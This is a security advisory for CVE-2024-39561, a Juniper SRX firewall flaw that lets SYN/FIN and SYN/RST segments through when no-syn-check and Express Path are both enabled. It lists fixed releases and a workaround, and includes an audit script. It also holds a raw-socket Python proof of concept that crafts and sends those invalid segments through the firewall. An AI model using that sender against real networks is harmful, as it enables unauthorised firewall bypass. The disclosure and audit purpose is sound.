PT-2024-6324 · Juniper Networks · Junos

Published

2024-06-25

·

Updated

2024-07-11

·

CVE-2024-39561

CVSS v4.0

6.9

Medium

Vector

AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Name of the Vulnerable Software and Affected Versions

Junos OS versions prior to 21.2R3-S8
Junos OS versions from 21.4 before 21.4R3-S7
Junos OS versions from 22.1 before 22.1R3-S6
Junos OS versions from 22.2 before 22.2R3-S4
Junos OS versions from 22.3 before 22.3R3-S3
Junos OS versions from 22.4 before 22.4R3-S2
Junos OS versions from 23.2 before 23.2R2
Junos OS versions from 23.4 before 23.4R1-S1, 23.4R2
Description

Juniper Networks Junos OS on the SRX4600 and SRX5000 Series contains an Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd). By default flowd drops any TCP segment that carries the SYN flag together with FIN, or SYN together with RST, since neither combination is a valid first packet of a session. When no-syn-check is configured and Express Path is enabled, that drop is skipped and such segments are forwarded to the downstream network. An unauthenticated, network-based attacker can therefore deliver SYN/FIN and SYN/RST segments to hosts behind the firewall that the firewall was expected to block. The CVSS vector reflects this: no impact on the SRX itself (VC:N/VI:N/VA:N), a low integrity impact on the subsequent, downstream systems (SI:L), and no privileges or user interaction required.
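The flag combinations the advisory names can be reproduced and checked without a device in the path. The following is an added example for this page, not Juniper code: it builds IPv4/TCP segments with SYN/FIN and SYN/RST set, verifies their checksums, and encodes flowd's expected default decision (drop) so that a capture on the downstream side of an SRX can be compared against it. The addresses and ports are placeholders from the documentation ranges, and the raw-socket send at the bottom is an assumption about how you would inject the segment from a Linux host in front of the firewall.

```python
"""Build TCP segments with SYN/FIN and SYN/RST flag combinations and
classify them the way flowd is expected to (drop) versus the way a
downstream capture shows them when the check is bypassed.

Added example for this advisory, not Juniper code.  Addresses, ports and
the raw-socket send at the bottom are placeholders/assumptions."""
import socket
import struct

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp(src_ip: str, dst_ip: str, sport: int, dport: int,
              flags: int, seq: int = 0) -> bytes:
    """20-byte TCP header (no options, no payload) with a valid checksum."""
    def header(csum: int) -> bytes:
        return struct.pack("!HHIIBBHHH", sport, dport, seq, 0,
                           5 << 4, flags, 65535, csum, 0)
    # TCP checksum covers a pseudo header (src, dst, zero, proto, length).
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, socket.IPPROTO_TCP, 20))
    return header(checksum(pseudo + header(0)))


def build_ipv4(src_ip: str, dst_ip: str, segment: bytes) -> bytes:
    """IPv4 header (no options) in front of the TCP segment."""
    def header(csum: int) -> bytes:
        return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(segment),
                           0x1234, 0, 64, socket.IPPROTO_TCP, csum,
                           socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return header(checksum(header(0))) + segment


def tcp_flags(packet: bytes) -> int:
    """Flag byte (offset 13) of the TCP header inside an IPv4 packet."""
    ihl = (packet[0] & 0x0F) * 4
    return packet[ihl + 13]


def flowd_should_drop(flags: int) -> bool:
    """Expected flowd default per the advisory: SYN combined with FIN or
    RST is not a valid first packet and is dropped.  Plain SYN, SYN/ACK
    and FIN/ACK are legitimate and pass."""
    return bool(flags & SYN) and bool(flags & (FIN | RST))


def checksums_ok(packet: bytes) -> bool:
    """Both IPv4 and TCP checksums verify: the sum including the stored
    checksum folds to zero."""
    ihl = (packet[0] & 0x0F) * 4
    segment = packet[ihl:]
    pseudo = (packet[12:16] + packet[16:20]
              + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(segment)))
    return checksum(packet[:ihl]) == 0 and checksum(pseudo + segment) == 0


if __name__ == "__main__":
    # Placeholder addresses: a host in front of the SRX and one behind it.
    src, dst = "192.0.2.10", "198.51.100.20"
    for name, flags in (("SYN/FIN", SYN | FIN), ("SYN/RST", SYN | RST)):
        pkt = build_ipv4(src, dst, build_tcp(src, dst, 40000, 80, flags))
        print(name, "expected by flowd:",
              "drop" if flowd_should_drop(tcp_flags(pkt)) else "forward")
        # Sending needs root and IP_HDRINCL (assumed Linux sender); watch
        # the downstream side with tcpdump to see whether it got through.
        with socket.socket(socket.AF_INET, socket.SOCK_RAW,
                           socket.IPPROTO_RAW) as s:
            s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
            s.sendto(pkt, (dst, 0))
```

On the downstream host, a filter such as tcpdump -ni eth0 'tcp[tcpflags] & (tcp-syn|tcp-fin) == (tcp-syn|tcp-fin)' shows whether the SYN/FIN segment crossed the firewall; on a fixed release, or with either no-syn-check or Express Path turned off, nothing should arrive.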
Recommendations

Upgrade to the first fixed release for the running branch, or any later release in that branch:

Versions prior to 21.2R3-S8: 21.2R3-S8 or later
21.4 before 21.4R3-S7: 21.4R3-S7 or later
22.1 before 22.1R3-S6: 22.1R3-S6 or later
22.2 before 22.2R3-S4: 22.2R3-S4 or later
22.3 before 22.3R3-S3: 22.3R3-S3 or later
22.4 before 22.4R3-S2: 22.4R3-S2 or later
23.2 before 23.2R2: 23.2R2 or later
23.4 before 23.4R1-S1: 23.4R1-S1, 23.4R2 or later

Until the upgrade is applied, break the triggering combination: remove no-syn-check from the security flow tcp-session configuration (restoring the default SYN check on the first packet of a session) or disable Express Path. The issue only occurs when both are enabled, so removing either one closes the forwarding path; leaving both enabled on an affected release keeps it exposed.
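Checking a fleet against the affected-version list above and the workaround conditions is mostly string handling, and getting the Junos release ordering right (23.4R1 is affected, 23.4R1-S1 is fixed) is where manual checks go wrong. The following is an added example for this page, not Juniper code, serving both the affected-versions list and the recommendations: it parses the release string from show version, compares it against the advisory's fixed releases, and scans a show configuration | display set dump for the two configuration halves. The fixed-release table and the affected models are taken from the advisory; the sample configurations are constructed; treating the per-policy services-offload keyword as the marker for Express Path is an assumption about how Express Path shows up in the configuration.

```python
"""Audit an SRX for CVE-2024-39561 exposure from data an operator already
has: the platform model, the Junos release string and the configuration
in 'display set' form.

Added example for this advisory, not Juniper code.  The fixed-release
table is the advisory's; the sample configurations are constructed.
'services-offload' on a policy is assumed to be the marker for Express
Path being enabled."""
import re

# First fixed release per branch, from the advisory.  Releases in a
# listed branch below the first fix are affected.  23.4 names two fixes
# (23.4R1-S1 and 23.4R2); release ordering puts 23.4R1-S1 first.
FIXED = {
    "21.2": ["21.2R3-S8"],
    "21.4": ["21.4R3-S7"],
    "22.1": ["22.1R3-S6"],
    "22.2": ["22.2R3-S4"],
    "22.3": ["22.3R3-S3"],
    "22.4": ["22.4R3-S2"],
    "23.2": ["23.2R2"],
    "23.4": ["23.4R1-S1", "23.4R2"],
}

# Platforms named in the advisory (SRX5000 Series = SRX5400/5600/5800).
AFFECTED_MODELS = {"srx4600", "srx5400", "srx5600", "srx5800"}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:-S(\d+))?(?:\.(\d+))?")


def parse_version(release: str) -> tuple:
    """Turn '22.4R3-S1.5' into a comparable tuple (22, 4, 3, 1, 5).
    A missing -S or build number counts as 0, so 23.4R1 < 23.4R1-S1."""
    m = VERSION_RE.match(release.strip())
    if not m:
        raise ValueError("unrecognised Junos release string: %r" % release)
    return tuple(int(g) if g else 0 for g in m.groups())


def version_status(release: str) -> str:
    """'affected', 'fixed', or 'not listed' (branch absent from advisory)."""
    v = parse_version(release)
    if v[:2] < (21, 2):
        return "affected"            # "versions prior to 21.2R3-S8"
    branch = "%d.%d" % v[:2]
    if branch not in FIXED:
        return "not listed"
    first_fix = min(parse_version(f) for f in FIXED[branch])
    return "affected" if v < first_fix else "fixed"


def exposing_config(display_set: str):
    """Return (no_syn_check_present, [policy lines with services-offload])."""
    lines = [l.strip() for l in display_set.splitlines()]
    no_syn_check = "set security flow tcp-session no-syn-check" in lines
    express_path = [l for l in lines
                    if l.startswith("set security policies ")
                    and l.endswith(" services-offload")]
    return no_syn_check, express_path


def assess(model: str, release: str, display_set: str) -> dict:
    """Combine the conditions the advisory requires: in-scope platform,
    affected release, no-syn-check set, and Express Path enabled."""
    status = version_status(release)
    no_syn_check, express_path = exposing_config(display_set)
    in_scope = model.lower() in AFFECTED_MODELS
    return {
        "model_in_scope": in_scope,
        "version_status": status,
        "no_syn_check": no_syn_check,
        "express_path_policies": express_path,
        "exposed": (in_scope and status == "affected"
                    and no_syn_check and bool(express_path)),
    }


# Constructed sample: the triggering combination ...
VULNERABLE_CONFIG = """\
set security flow tcp-session no-syn-check
set security policies from-zone trust to-zone untrust policy allow-web match source-address any
set security policies from-zone trust to-zone untrust policy allow-web match destination-address any
set security policies from-zone trust to-zone untrust policy allow-web match application junos-http
set security policies from-zone trust to-zone untrust policy allow-web then permit services-offload
"""

# ... and the workaround applied (no-syn-check removed, Express Path kept).
WORKAROUND_CONFIG = "\n".join(
    l for l in VULNERABLE_CONFIG.splitlines()
    if not l.endswith("no-syn-check")) + "\n"


if __name__ == "__main__":
    for rel in ("22.4R3-S1.5", "22.4R3-S2", "23.4R1", "23.4R1-S1"):
        print(rel, version_status(rel))
    print("exposed:", assess("SRX5800", "22.4R3-S1.5", VULNERABLE_CONFIG)["exposed"])
    print("after workaround:", assess("SRX5800", "22.4R3-S1.5", WORKAROUND_CONFIG)["exposed"])
```

The inputs come straight from the CLI: the Junos line of show version supplies the release string, and show configuration | display set supplies the text passed to assess. A "not listed" result means the branch is not in the advisory and needs a vendor check rather than being treated as safe.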

Fix

Weakness Enumeration

CWE-754: Improper Check for Unusual or Exceptional Conditions

Related Identifiers

BDU:2024-07275
CVE-2024-39561

Affected Products

Junos